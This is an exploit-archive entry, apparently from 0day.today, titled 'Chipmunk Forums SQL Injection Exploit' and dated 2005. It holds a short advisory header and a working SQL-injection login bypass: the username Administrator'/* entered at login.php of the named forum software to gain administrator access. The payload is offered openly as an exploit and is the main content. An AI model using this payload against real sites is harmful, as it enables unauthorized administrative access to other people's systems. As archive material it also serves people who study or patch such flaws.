id: 67
date: 02/10/2005
title: Chipmunk Forums SQL Injection Exploit
author: GHC
cves: 

=====================================
Chipmunk Forums SQL Injection Exploit
=====================================




/*==========================================*/
// GHC -> Chipmunk forum <- ADVISORY
// Product: Chipmunk Forums
// URL: http://www.chipmunk-scripts.com/board
// VULNERABILITY CLASS: SQL injection
// RISK: hight
/*==========================================*/

[exploit]
at login.php enter user name as
Administrator'/*



#  0day.today [2023-03-25]  #